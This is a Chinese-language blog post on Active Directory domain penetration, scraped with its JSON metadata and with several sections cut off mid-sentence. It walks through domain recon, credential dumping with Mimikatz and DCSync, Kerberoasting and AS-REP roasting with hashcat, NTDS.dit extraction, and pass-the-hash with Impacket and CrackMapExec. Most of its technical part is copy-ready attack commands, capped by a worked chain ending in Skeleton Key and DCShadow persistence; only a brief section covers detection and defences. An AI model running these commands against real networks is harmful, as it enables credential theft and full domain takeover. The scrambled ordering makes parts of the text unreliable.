\u57df\u6e17\u900f\u662f\u5185\u7f51\u6e17\u900f\u7684\u6838\u5fc3\u73af\u8282\u3002\u5728\u771f\u5b9e\u7684\u653b\u9632\u573a\u666f\u4e2d\uff0c\u62ff\u4e0b Web \u670d\u52a1\u5668\u5f80\u5f80\u53ea\u662f\u5165\u53e3\uff0c\u771f\u6b63\u7684\u76ee\u6807\u901a\u5e38\u662f\u57df\u63a7\u5236\u5668\uff08DC\uff09\u4e0a\u7684\u57df\u7ba1\u7406\u5458\u6743\u9650\u3002\u672c\u6587\u4ece\u653b\u9632\u89c6\u89d2\u7cfb\u7edf\u68b3\u7406\u57df\u6e17\u900f\u7684\u5b8c\u6574\u653b\u51fb\u94fe\u2014\u2014\u4ece\u57df\u73af\u5883\u4fa6\u5bdf\u3001\u51ed\u8bc1\u83b7\u53d6\u3001\u6a2a\u5411\u79fb\u52a8\u5230\u6743\u9650\u63d0\u5347\u4e0e\u7ef4\u6301\uff0c\u7a7f\u63d2\u7ecf\u5178\u5de5\u5177\u7684\u539f\u7406\u5256\u6790\u548c\u5b9e\u6218\u6848\u4f8b\u3002<\/p>\n\n\n\n
Active Directory\uff08AD\uff09\u662f Windows \u4f01\u4e1a\u7f51\u7edc\u7684\u6838\u5fc3\u8eab\u4efd\u8ba4\u8bc1\u670d\u52a1\uff0c\u7ba1\u7406\u7740\u57df\u5185\u7684\u7528\u6237\u3001\u8ba1\u7b97\u673a\u3001\u7ec4\u7b56\u7565\u7b49\u8d44\u6e90\u3002\u7406\u89e3 AD \u7684\u51e0\u4e2a\u6838\u5fc3\u6982\u5ff5\u662f\u57df\u6e17\u900f\u7684\u524d\u63d0\uff1a<\/p>\n\n\n\n \u8fdb\u5165\u5185\u7f51\u540e\u7684\u7b2c\u4e00\u6b65\u662f\u4fe1\u606f\u6536\u96c6\u3002\u76ee\u6807\u662f\u641e\u6e05\u695a”\u6211\u5728\u54ea\u3001\u57df\u53eb\u4ec0\u4e48\u3001DC \u662f\u8c01\u3001\u6709\u54ea\u4e9b\u57df\u7ba1\u3001\u57df\u5185\u6709\u591a\u5c11\u4e3b\u673a”\u3002<\/p>\n\n\n\n BloodHound<\/strong> \u662f\u57df\u6e17\u900f\u4e2d\u6700\u91cd\u8981\u7684\u4fa6\u5bdf\u5de5\u5177\u3002\u5b83\u901a\u8fc7\u56fe\u6570\u636e\u5e93\uff08Neo4j\uff09\u53ef\u89c6\u5316\u5206\u6790\u57df\u5185 ACL\u3001\u6210\u5458\u5173\u7cfb\u3001\u4f1a\u8bdd\u7b49\u653b\u51fb\u8def\u5f84\u3002<\/p>\n\n\n\n BloodHound \u7684\u6838\u5fc3\u4ef7\u503c\u5728\u4e8e\u653b\u51fb\u8def\u5f84\u89c4\u5212<\/strong>\u3002\u4f60\u62ff\u4e0b\u4e00\u53f0 Web \u670d\u52a1\u5668\u4e0a\u7684\u672c\u5730\u7ba1\u7406\u5458\u540e\uff0c\u901a\u8fc7 BloodHound \u53ef\u4ee5\u76f4\u89c2\u5730\u770b\u5230\u4ece\u8fd9\u53f0\u673a\u5668\u80fd\u8df3\u5230\u54ea\u4e9b\u4e3b\u673a\u3001\u54ea\u4e9b\u7528\u6237\u5728 DC \u4e0a\u6709\u4f1a\u8bdd\u3001\u54ea\u4e9b\u7ec4\u4e4b\u95f4\u5b58\u5728\u5d4c\u5957\u5173\u7cfb\uff0c\u4ece\u800c\u89c4\u5212\u6700\u77ed\u7684\u63d0\u6743\u8def\u5f84\u3002<\/p>\n\n\n\n \u6a2a\u5411\u79fb\u52a8\u7684\u6838\u5fc3\u662f\u51ed\u8bc1\u3002Windows \u7cfb\u7edf\u4e2d\u51ed\u636e\u7684\u5b58\u50a8\u4f4d\u7f6e\u591a\u79cd\u591a\u6837\uff1aLSASS \u8fdb\u7a0b\u5185\u5b58\u3001SAM \u6570\u636e\u5e93\u3001NTDS.dit\u3001\u51ed\u636e\u7ba1\u7406\u5668\u3001\u6d4f\u89c8\u5668\u4fdd\u5b58\u5bc6\u7801\u3001\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u660e\u6587\u5bc6\u7801\u7b49\u3002<\/p>\n\n\n\n Kerberoasting \u653b\u51fb\u7684\u5bf9\u8c61\u662f\u6ce8\u518c\u4e86 SPN\uff08Service Principal Name\uff09\u7684\u57df\u7528\u6237\u8d26\u53f7\u3002\u5f53\u57df\u5185\u4efb\u610f\u7528\u6237\u5411 DC \u8bf7\u6c42\u8be5\u670d\u52a1\u7684 TGS \u7968\u636e\u65f6\uff0cDC \u4f1a\u7528\u76ee\u6807\u670d\u52a1\u8d26\u53f7\u7684 NTLM Hash \u52a0\u5bc6\u7968\u636e\u3002\u653b\u51fb\u8005\u62ff\u5230\u52a0\u5bc6\u7968\u636e\u540e\u53ef\u4ee5\u79bb\u7ebf\u7206\u7834\u3002<\/p>\n\n\n\n \u5bf9\u4e8e\u4e0d\u8981\u6c42 Kerberos \u9884\u8ba4\u8bc1<\/strong>\u7684\u7528\u6237\uff08\u8bbe\u7f6e\u4e86 DONT_REQ_PREAUTH \u6807\u5fd7\uff09\uff0c\u653b\u51fb\u8005\u65e0\u9700\u4efb\u4f55\u51ed\u8bc1\u5373\u53ef\u8bf7\u6c42\u8be5\u7528\u6237\u7684 AS-REP \u54cd\u5e94\uff0c\u5176\u4e2d\u5305\u542b\u7528\u7528\u6237\u5bc6\u7801\u52a0\u5bc6\u7684\u4f1a\u8bdd\u5bc6\u94a5\uff0c\u53ef\u79bb\u7ebf\u7206\u7834\u3002<\/p>\n\n\n\n \u62ff\u5230 DC \u7ba1\u7406\u5458\u6743\u9650\u540e\u7684\u7ec8\u6781\u76ee\u6807\u2014\u2014\u5bfc\u51fa\u6574\u4e2a\u57df\u7684\u7528\u6237 Hash\u3002<\/p>\n\n\n\n \u83b7\u53d6\u4e00\u53f0\u673a\u5668\u7684\u51ed\u8bc1\u540e\uff0c\u4e0b\u4e00\u6b65\u662f\u5411\u57df\u5185\u5176\u4ed6\u4e3b\u673a\u3001\u6700\u7ec8\u5411\u57df\u63a7\u5236\u5668\u79fb\u52a8\u3002\u6a2a\u5411\u79fb\u52a8\u7684\u65b9\u6cd5\u53d6\u51b3\u4e8e\u624b\u5934\u6709\u4ec0\u4e48\u2014\u2014\u662f\u660e\u6587\u5bc6\u7801\u3001NTLM Hash \u8fd8\u662f Kerberos \u7968\u636e\u3002<\/p>\n\n\n\n NTLM \u8ba4\u8bc1\u7684\u7ecf\u5178\u7f3a\u9677\uff1a\u4e0d\u9700\u8981\u660e\u6587\u5bc6\u7801\uff0c\u53ea\u8981\u62ff\u5230 NTLM Hash \u5c31\u80fd\u4ee5\u8be5\u7528\u6237\u8eab\u4efd\u767b\u5f55\u5176\u4ed6\u7cfb\u7edf\u3002<\/p>\n\n\n\n \u5c06\u5bfc\u51fa\u7684 .kirbi \u7968\u636e\u6ce8\u5165\u5f53\u524d\u4f1a\u8bdd\uff0c\u4ee5\u8be5\u7968\u636e\u5bf9\u5e94\u8eab\u4efd\u8bbf\u95ee\u8d44\u6e90\uff0c\u65e0\u9700\u5bc6\u7801\u6216 Hash\u3002<\/p>\n\n\n\n \u62ff\u5230 \u4e0e\u9ec4\u91d1\u7968\u636e\u4e0d\u540c\uff0c\u767d\u94f6\u7968\u636e\u4f2a\u9020\u7684\u662f\u670d\u52a1\u7968\u636e\uff08TGS\uff09<\/strong>\u800c\u975e TGT\u3002\u5b83\u53ea\u9700\u8981\u76ee\u6807\u670d\u52a1\u7684\u673a\u5668\u8d26\u6237 Hash<\/strong>\uff0c\u800c\u975e krbtgt Hash\u3002\u66f4\u9690\u853d\uff0c\u56e0\u4e3a\u4e0d\u9700\u8981\u4e0e DC \u4ea4\u4e92\u3002<\/p>\n\n\n\n \u7528 NTLM Hash \u8bf7\u6c42 Kerberos TGT\uff0c\u5c06 NTLM \u8ba4\u8bc1”\u5347\u7ea7”\u4e3a Kerberos \u8ba4\u8bc1\uff0c\u7136\u540e\u8f6c\u4e3a Pass-the-Ticket\u3002\u6838\u5fc3\u5de5\u5177\u662f Rubeus \u7684 \u8fdb\u5165\u5185\u7f51\u7684\u4e3b\u673a\u53ef\u80fd\u53ea\u662f\u4e00\u4e2a\u666e\u901a\u7528\u6237\u6743\u9650\uff0c\u9700\u8981\u5148\u63d0\u6743\u5230\u672c\u5730 SYSTEM \u624d\u80fd\u8fdb\u884c\u51ed\u8bc1\u63d0\u53d6\u548c\u540e\u7eed\u6a2a\u5411\u79fb\u52a8\u3002<\/p>\n\n\n\n krbtgt \u8d26\u6237\u7684\u5bc6\u7801\u6781\u5c11\u88ab\u91cd\u7f6e\uff08\u5f71\u54cd\u6574\u4e2a\u57df\u7684\u6b63\u5e38\u8ba4\u8bc1\u6d41\u7a0b\uff09\uff0c\u56e0\u6b64\u83b7\u53d6 krbtgt Hash \u540e\u53ef\u4ee5\u957f\u671f\u6301\u6709\u57df\u63a7\u5236\u6743\u3002\u5373\u4f7f\u57df\u7ba1\u5bc6\u7801\u88ab\u4fee\u6539\uff0c\u9ec4\u91d1\u7968\u636e\u4f9d\u7136\u6709\u6548\u3002\u4e0d\u8fc7\u9700\u8981\u77e5\u9053\u7684\u662f\uff0c\u91cd\u7f6e krbtgt \u5bc6\u7801\u4e24\u6b21\uff08\u95f4\u9694\u5927\u4e8e\u7968\u636e\u6700\u5927\u751f\u547d\u5468\u671f\uff09\u53ef\u4ee5\u4f5c\u5e9f\u6240\u6709\u5df2\u6709\u7968\u636e\u3002<\/p>\n\n\n\n \u5728\u57df\u63a7\u5236\u5668\u4e0a\u5b89\u88c5 Skeleton Key \u540e\uff0c\u6240\u6709\u57df\u7528\u6237\u90fd\u53ef\u4ee5\u4f7f\u7528\u4e00\u4e2a\u9884\u8bbe\u7684”\u4e07\u80fd\u5bc6\u7801”\uff08\u9ed8\u8ba4\u662f DCShadow \u662f Mimikatz \u7684\u4e00\u9879\u9ad8\u7ea7\u529f\u80fd\uff0c\u5141\u8bb8\u5177\u6709\u57df\u7ba1\u6743\u9650\u7684\u653b\u51fb\u8005\u5c06\u81ea\u5df1\u7684\u673a\u5668\u4f2a\u88c5\u4e3a\u57df\u63a7\u5236\u5668<\/strong>\uff0c\u5728 AD \u4e2d\u590d\u5236\u4efb\u610f\u66f4\u6539\uff08\u6dfb\u52a0\u540e\u95e8\u7528\u6237\u3001\u4fee\u6539 ACL \u7b49\uff09\u3002\u8fd9\u4e9b\u66f4\u6539\u901a\u8fc7\u6807\u51c6\u7684 AD \u590d\u5236\u534f\u8bae\u4f20\u64ad\uff0c\u5f88\u96be\u4e0e\u6b63\u5e38\u7684 AD \u590d\u5236\u6d41\u91cf\u533a\u5206\u3002<\/p>\n\n\n\n \u4e0b\u9762\u4e32\u8054\u4e00\u4e2a\u5178\u578b\u7684\u57df\u6e17\u900f\u653b\u51fb\u94fe\uff0c\u5c55\u793a\u5404\u7c7b\u6280\u672f\u5982\u4f55\u5728\u5b9e\u9645\u573a\u666f\u4e2d\u7ec4\u5408\u4f7f\u7528\uff1a<\/p>\n\n\n\n \u9636\u6bb5 1 \u2014 \u521d\u59cb\u5165\u53e3<\/strong>\uff1a\u901a\u8fc7 Web \u6f0f\u6d1e\uff08\u5982\u53cd\u5e8f\u5217\u5316\/\u6587\u4ef6\u4e0a\u4f20\uff09\u83b7\u5f97 Web \u670d\u52a1\u5668\uff0810.0.0.100\uff09\u7684\u666e\u901a shell\u3002Web \u670d\u52a1\u5668\u8fd0\u884c\u5728 IIS \u7684 ApplicationPoolIdentity \u4e0b\uff0c\u6743\u9650\u5f88\u4f4e\u3002<\/p>\n\n\n\n \u9636\u6bb5 2 \u2014 \u672c\u5730\u63d0\u6743<\/strong>\uff1a\u6267\u884c \u9636\u6bb5 3 \u2014 \u51ed\u8bc1\u83b7\u53d6<\/strong>\uff1aSYSTEM \u6743\u9650\u4e0b \u9636\u6bb5 4 \u2014 \u6a2a\u5411\u79fb\u52a8<\/strong>\uff1a\u4f7f\u7528 CrackMapExec \u5bf9 10.0.0.0\/24 \u7f51\u6bb5\u55b7\u6d12 svc_iis \u51ed\u8bc1\uff0c\u53d1\u73b0 10.0.0.50 \u4e0a\u4e5f\u6709\u672c\u5730\u7ba1\u7406\u5458\u6743\u9650\u3002BloodHound \u5206\u6790\u663e\u793a 10.0.0.50 \u4e0a\u6709\u4e00\u4e2a\u57df\u7ba1\uff08Domain Admin\uff09\u7684\u767b\u5f55\u4f1a\u8bdd\u3002\u4f7f\u7528 Mimikatz \u5728\u8fd9\u53f0\u673a\u5668\u4e0a\u6210\u529f\u5bfc\u51fa\u57df\u7ba1\u7684\u767b\u5f55\u51ed\u8bc1\u3002<\/p>\n\n\n\n \u9636\u6bb5 5 \u2014 DC \u63a7\u5236<\/strong>\uff1a\u7528\u57df\u7ba1\u51ed\u8bc1 DCSync \u5bfc\u51fa\u6574\u4e2a\u57df\u7684 Hash\uff1a \u9636\u6bb5 6 \u2014 \u6301\u4e45\u5316<\/strong>\uff1a\u5728 DC \u4e0a\u5b89\u88c5 Skeleton Key\uff0c\u521b\u5efa\u9690\u853d\u7684\u5f71\u5b50\u8d26\u6237\uff0c\u5e76\u901a\u8fc7 DCShadow \u5728 AD \u4e2d\u5199\u5165\u540e\u95e8 ACL\uff0c\u5b9e\u73b0\u591a\u5c42\u6301\u4e45\u5316\uff0c\u5373\u4f7f\u67d0\u4e2a\u540e\u95e8\u88ab\u6e05\u9664\u4e5f\u4e0d\u5f71\u54cd\u6574\u4f53\u63a7\u5236\u3002<\/p>\n\n\n\n \u4ece\u84dd\u961f\u89c6\u89d2\uff0c\u57df\u6e17\u900f\u653b\u51fb\u94fe\u7684\u6bcf\u4e2a\u9636\u6bb5\u90fd\u6709\u53ef\u68c0\u6d4b\u7684\u7279\u5f81\uff1a<\/p>\n\n\n\n \u9632\u5fa1\u8981\u70b9\uff1a\u542f\u7528 Windows Defender Credential Guard \u9694\u79bb LSASS\uff1b\u90e8\u7f72 LAPS\uff08Local Administrator Password Solution\uff09\u7ba1\u7406\u672c\u5730\u7ba1\u7406\u5458\u5bc6\u7801\uff0c\u786e\u4fdd\u6bcf\u53f0\u4e3b\u673a\u7684\u672c\u5730\u7ba1\u7406\u5458\u5bc6\u7801\u552f\u4e00\uff1b\u5b9a\u671f\u5ba1\u8ba1 ACL \u548c\u59d4\u6d3e\u914d\u7f6e\uff08\u5584\u7528 BloodHound \u4ece\u84dd\u961f\u89c6\u89d2\u5206\u6790\uff09\uff1b\u91cd\u70b9\u76d1\u63a7 DCSync \u548c Kerberos \u7968\u636e\u5f02\u5e38\uff1b\u542f\u7528 LDAP signing \u548c LDAPS \u9632\u6b62 NTLM \u4e2d\u7ee7\uff1b\u6b63\u786e\u914d\u7f6e AD CS \u8bc1\u4e66\u6a21\u677f\u6743\u9650\uff08\u91cd\u70b9\u5173\u6ce8 ESC1-ESC8\uff09\u3002<\/p>\n\n\n\n \u57df\u6e17\u900f\u7684\u672c\u8d28\u662f\u4fe1\u4efb\u94fe\u7684\u4f20\u9012\u4e0e\u6ee5\u7528<\/strong>\u2014\u2014Kerberos \u4fe1\u4efb TGT\uff0c\u670d\u52a1\u4fe1\u4efb SPN\uff0c\u7ec4\u7b56\u7565\u4fe1\u4efb GPO \u7f16\u8f91\u8005\uff0cACL \u4fe1\u4efb\u53d8\u66f4\u8005\u3002\u653b\u51fb\u8005\u7684\u6bcf\u4e00\u6b65\u90fd\u662f\u5728\u5229\u7528\u8fd9\u4e9b\u9884\u8bbe\u7684\u4fe1\u4efb\u5173\u7cfb\uff0c\u4ece\u4e00\u4e2a\u53d7\u4fe1\u4efb\u7684\u8282\u70b9\u8df3\u5230\u4e0b\u4e00\u4e2a\u3002<\/p>\n\n\n\n \u4f5c\u4e3a\u653b\u9632\u7684\u4e24\u9762\u2014\u2014\u7ea2\u961f\u9700\u8981\u7cfb\u7edf\u5316\u5730\u7406\u89e3\u8fd9\u4e9b\u4fe1\u4efb\u5173\u7cfb\u5e76\u4e32\u8054\u653b\u51fb\u8def\u5f84\uff0c\u84dd\u961f\u5219\u9700\u8981\u5728\u6bcf\u4e2a\u4fe1\u4efb\u8fb9\u754c\u4e0a\u8bbe\u7f6e\u68c0\u6d4b\u70b9\u3002\u65e0\u8bba\u662f\u8fdb\u653b\u8fd8\u662f\u9632\u5b88\uff0c\u638c\u63e1\u672c\u6587\u6d89\u53ca\u7684\u5404\u7c7b\u6280\u672f\u548c\u5de5\u5177\uff0c\u7406\u89e3 Kerberos \u8ba4\u8bc1\u548c AD \u4fe1\u4efb\u6a21\u578b\u7684\u5e95\u5c42\u673a\u5236\uff0c\u90fd\u662f\u6df1\u5165\u57df\u6e17\u900f\u9886\u57df\u7684\u5fc5\u7ecf\u4e4b\u8def\u3002<\/p>\n\n\n\n \u53c2\u8003\u8d44\u6e90<\/strong>\uff1aMITRE ATT&CK Enterprise Matrix\uff08TA0006 Credential Access \/ TA0008 Lateral Movement\uff09\u3001adsecurity.org\uff08Sean Metcalf \u7684 Kerberos \u7cfb\u5217\uff09\u3001harmj0y \u7684 BloodHound \u767d\u76ae\u4e66\u3001ired.team \u7ea2\u961f\u7b14\u8bb0\u3001Pentestlab Blog\u3002<\/p>\nn","protected":false},"excerpt":{"rendered":" \u57df\u6e17\u900f\u662f\u5185\u7f51\u6e17\u900f\u7684\u6838\u5fc3\u73af\u8282\u3002\u5728\u771f\u5b9e\u7684\u653b\u9632\u573a\u666f\u4e2d\uff0c\u62ff\u4e0b Web \u670d\u52a1\u5668\u5f80\u5f80\u53ea\u662f\u5165\u53e3\uff0c\u771f\u6b63\u7684\u76ee\u6807\u901a\u5e38\u662f\u57df\u63a7\u5236\u5668\uff08D […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[30,29,31,28,27,32],"class_list":["post-122","post","type-post","status-publish","format-standard","hentry","category-rz","tag-active-directory","tag-kerberos","tag-mimikatz","tag-28","tag-27","tag-32"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/comments?post=122"}],"version-history":[{"count":3,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions"}],"predecessor-version":[{"id":165,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions\/165"}],"wp:attachment":[{"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/media?parent=122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/categories?post=122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fisssssh.top\/index.php\/wp-json\/wp\/v2\/tags?post=122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\u6982\u5ff5<\/th> \u8bf4\u660e<\/th><\/tr><\/thead> \u57df\uff08Domain\uff09<\/strong><\/td> AD \u7684\u903b\u8f91\u7ba1\u7406\u5355\u5143\uff0c\u5171\u4eab\u540c\u4e00\u76ee\u5f55\u6570\u636e\u5e93<\/td><\/tr> \u57df\u63a7\u5236\u5668\uff08DC\uff09<\/strong><\/td> \u8fd0\u884c AD \u57df\u670d\u52a1\u7684\u670d\u52a1\u5668\uff0c\u5b58\u50a8\u76ee\u5f55\u6570\u636e\u5e76\u5904\u7406\u8eab\u4efd\u9a8c\u8bc1\uff0c\u9ed8\u8ba4\u8fd0\u884c\u5728 Windows Server \u4e0a<\/td><\/tr> \u7ec4\u7ec7\u5355\u4f4d\uff08OU\uff09<\/strong><\/td> AD \u4e2d\u7684\u5bb9\u5668\uff0c\u7528\u4e8e\u7ec4\u7ec7\u7528\u6237\u3001\u8ba1\u7b97\u673a\u3001\u7ec4\u7b49\u5bf9\u8c61\uff0c\u4fbf\u4e8e\u59d4\u6d3e\u7ba1\u7406\u548c\u5e94\u7528\u7ec4\u7b56\u7565<\/td><\/tr> Kerberos<\/strong><\/td> AD \u9ed8\u8ba4\u8ba4\u8bc1\u534f\u8bae\uff0c\u57fa\u4e8e\u7968\u636e\uff08Ticket\uff09\u673a\u5236\uff0c\u5305\u542b AS-REQ\/AS-REP\u3001TGS-REQ\/TGS-REP \u7b49\u5173\u952e\u4ea4\u4e92\u6b65\u9aa4<\/td><\/tr> NTDS.dit<\/strong><\/td> AD \u6570\u636e\u5e93\u6587\u4ef6\uff0c\u5b58\u50a8\u6240\u6709\u57df\u7528\u6237\u7684 NTLM Hash\uff08\u4f4d\u4e8e %SystemRoot%NTDSntds.dit\uff09<\/td><\/tr> \u7ec4\u7b56\u7565\uff08GPO\uff09<\/strong><\/td> \u57df\u7ba1\u7406\u5458\u901a\u8fc7 GPO \u7edf\u4e00\u7ba1\u7406\u57df\u5185\u8ba1\u7b97\u673a\u7684\u914d\u7f6e\u548c\u5b89\u5168\u7b56\u7565\uff0c\u5e38\u88ab\u653b\u51fb\u8005\u5229\u7528\u5b9e\u73b0\u6301\u4e45\u5316<\/td><\/tr> \u5168\u5c40\u7f16\u5f55\uff08GC\uff09<\/strong><\/td> \u5305\u542b\u6797\u4e2d\u6bcf\u4e2a\u57df\u5bf9\u8c61\u7684\u90e8\u5206\u526f\u672c\uff0c\u7528\u4e8e\u52a0\u901f\u8de8\u57df\u67e5\u8be2\uff0c\u9ed8\u8ba4\u5728\u7b2c\u4e00\u4e2a DC \u4e0a\u542f\u7528<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n \u4e8c\u3001\u57df\u73af\u5883\u4fa6\u5bdf<\/h2>\n\n\n\n
2.1 \u672c\u673a\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n
# \u57fa\u7840\u4fe1\u606fnwhoami \/all # \u5f53\u524d\u7528\u6237\u53ca\u6743\u9650nsysteminfo # \u7cfb\u7edf\u8865\u4e01\u3001\u7248\u672cnipconfig \/all # \u7f51\u7edc\u914d\u7f6e\uff08DNS \u670d\u52a1\u5668\u901a\u5e38\u5c31\u662f DC\uff09nnet config workstation # \u67e5\u770b\u662f\u5426\u5728\u57df\u4e2dncmdkey \/list # \u51ed\u636e\u7ba1\u7406\u5668\u4e2d\u7f13\u5b58\u7684\u51ed\u636entasklist \/svc # \u8fdb\u7a0b\u53ca\u670d\u52a1nnetstat -ano # \u7aef\u53e3\u53ca\u8fde\u63a5<\/code><\/pre>\n\n\n\n2.2 \u57df\u73af\u5883\u63a2\u6d4b<\/h3>\n\n\n\n
# \u57df\u57fa\u672c\u4fe1\u606fnnet user \/domain # \u57df\u7528\u6237\u5217\u8868nnet group \/domain # \u57df\u7ec4\u5217\u8868nnet group \"Domain Admins\" \/domain # \u57df\u7ba1\u7406\u5458nnet group \"Enterprise Admins\" \/domain # \u4f01\u4e1a\u7ba1\u7406\u5458nnet group \"Domain Controllers\" \/domain # \u57df\u63a7\u5236\u5668nnet time \/domain # \u67e5\u770b\u57df\u65f6\u95f4\uff08\u901a\u5e38\u6307\u5411 DC\uff09nnet accounts \/domain # \u57df\u5bc6\u7801\u7b56\u7565nn# DNS \u67e5\u8be2nnslookup -type=SRV _ldap._tcp.dc._msdcs.<FQDN> # \u5b9a\u4f4d DCnnslookup -type=SRV _kerberos._tcp.<FQDN> # \u5b9a\u4f4d KDC<\/code><\/pre>\n\n\n\n2.3 BloodHound \u5206\u6790<\/h3>\n\n\n\n
# SharpHound \u91c7\u96c6\uff08\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6267\u884c\uff09nSharpHound.exe -c All --zipfilename domain.zipnn# \u6216\u4f7f\u7528 Python \u7248\u91c7\u96c6\u5668\uff08\u4ece\u653b\u51fb\u673a\uff09nbloodhound-python -d corp.local -u user -p pass -gc dc01.corp.local -c all -ns 10.0.0.1nn# \u5bfc\u5165 BloodHound \u540e\u53ef\u67e5\u8be2\u7684\u653b\u51fb\u8def\u5f84\uff1an# - Find Shortest Path to Domain Admins\uff08\u5230\u8fbe\u57df\u7ba1\u7684\u6700\u77ed\u8def\u5f84\uff09n# - Find Principals with DCSync Rights\uff08\u5177\u6709 DCSync \u6743\u9650\u7684\u4e3b\u4f53\uff09n# - Find Kerberoastable Users\uff08\u53ef Kerberoasting \u7684\u7528\u6237\uff09n# - Find AS-REP Roastable Users\uff08\u4e0d\u9700\u8981 Kerberos \u9884\u8ba4\u8bc1\u7684\u7528\u6237\uff09<\/code><\/pre>\n\n\n\n\u4e09\u3001\u51ed\u8bc1\u83b7\u53d6<\/h2>\n\n\n\n
3.1 Mimikatz \u2014 \u51ed\u8bc1\u63d0\u53d6\u745e\u58eb\u519b\u5200<\/h3>\n\n\n\n
# \u57fa\u7840\u547d\u4ee4\uff08\u9700\u8981\u7ba1\u7406\u5458\u6216 SYSTEM \u6743\u9650\uff09nprivilege::debug # \u63d0\u6743\u5230 SeDebugPrivilegenn# \u4ece LSASS \u5bfc\u51fa\u660e\u6587\u5bc6\u7801\u548c NTLM Hashnsekurlsa::logonpasswords # \u5bfc\u51fa\u6240\u6709\u767b\u5f55\u51ed\u8bc1\uff08\u660e\u6587 + Hash + Kerberos Ticket\uff09nn# \u4ece SAM \u5bfc\u51fa\u672c\u5730\u8d26\u6237 Hashntoken::elevate # \u63d0\u5347\u4e3a SYSTEMnlsadump::sam # \u5bfc\u51fa\u672c\u5730 SAM \u4e2d\u7684 Hashnn# DCSync \u2014 \u6a21\u62df DC \u8bf7\u6c42\u590d\u5236\u51ed\u636e\uff08\u9700\u8981\u57df\u7ba1\u6216 DCSync \u6743\u9650\uff09nlsadump::dcsync \/domain:corp.local \/user:krbtgt # \u5bfc\u51fa krbtgt \u7684 Hashnlsadump::dcsync \/domain:corp.local \/all # \u5bfc\u51fa\u6240\u6709\u57df\u7528\u6237 Hashnn# \u5bfc\u51fa\u7968\u636ensekurlsa::tickets \/export # \u5bfc\u51fa\u6240\u6709 Kerberos \u7968\u636e\u5230 .kirbi \u6587\u4ef6<\/code><\/pre>\n\n\n\n3.2 Kerberoasting<\/h3>\n\n\n\n
# \u4f7f\u7528 Impacket \u7684 GetUserSPNsnGetUserSPNs.py corp.local\/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txtnn# \u4f7f\u7528 RubeusnRubeus.exe kerberoast \/outfile:hashes.txtnn# \u79bb\u7ebf\u7206\u7834nhashcat -m 13100 hashes.txt \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n3.3 AS-REP Roasting<\/h3>\n\n\n\n
# ImpacketnGetNPUsers.py corp.local\/ -usersfile users.txt -dc-ip 10.0.0.1 -format hashcatnn# RubeusnRubeus.exe asreproast \/outfile:asrep.txtnn# \u7206\u7834nhashcat -m 18200 asrep.txt \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n3.4 NTDS.dit \u63d0\u53d6<\/h3>\n\n\n\n
# \u65b9\u6cd51: NTDSUtil\uff08Windows \u81ea\u5e26\uff09nntdsutil \"ac i ntds\" \"ifm\" \"create full c:temp\" q qnn# \u65b9\u6cd52: VSS \u5377\u5f71\u590d\u5236 + \u6ce8\u518c\u8868nvssadmin create shadow \/for=C:ncopy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSntds.dit c:temp\nreg save HKLMSYSTEM c:tempsystem.hivenn# \u65b9\u6cd53: Impacket secretsdump\uff08\u9700\u8981 DC \u7ba1\u7406\u5458\u6743\u9650\uff09nsecretsdump.py corp.local\/admin@10.0.0.1 -just-dc-ntlmnn# \u79bb\u7ebf\u89e3\u6790nsecretsdump.py -ntds ntds.dit -system system.hive LOCAL<\/code><\/pre>\n\n\n\n\u56db\u3001\u6a2a\u5411\u79fb\u52a8<\/h2>\n\n\n\n
4.1 Pass-the-Hash\uff08PtH\uff09\u2014 NTLM Hash \u4f20\u9012<\/h3>\n\n\n\n
# Impacket wmiexec\uff08WMI \u8fdc\u7a0b\u6267\u884c\uff09nwmiexec.py -hashes :<NTLM_HASH> corp.local\/admin@10.0.0.5nn# Impacket smbexec\uff08SMB \u8fdc\u7a0b\u6267\u884c\uff09nsmbexec.py -hashes :<NTLM_HASH> corp.local\/admin@10.0.0.5nn# Impacket psexec\uff08\u670d\u52a1\u65b9\u5f0f\u8fdc\u7a0b\u6267\u884c\uff0c\u4f1a\u843d\u76d8\u4f1a\u88ab EDR \u68c0\u6d4b\uff09npsexec.py -hashes :<NTLM_HASH> corp.local\/admin@10.0.0.5nn# CrackMapExecutor\uff08\u6279\u91cf PtH\uff09ncrackmapexec smb 10.0.0.0\/24 -u admin -H <NTLM_HASH> -d corp.local<\/code><\/pre>\n\n\n\n4.2 Pass-the-Ticket\uff08PtT\uff09\u2014 Kerberos \u7968\u636e\u4f20\u9012<\/h3>\n\n\n\n
# Mimikatz \u6ce8\u5165\u7968\u636enkerberos::ptt ticket.kirbinn# Rubeus \u6ce8\u5165nRubeus.exe ptt \/ticket:ticket.kirbinn# \u67e5\u770b\u5f53\u524d\u4f1a\u8bdd\u4e2d\u7684\u7968\u636enklist<\/code><\/pre>\n\n\n\n4.3 Golden Ticket \u2014 \u9ec4\u91d1\u7968\u636e<\/h3>\n\n\n\n
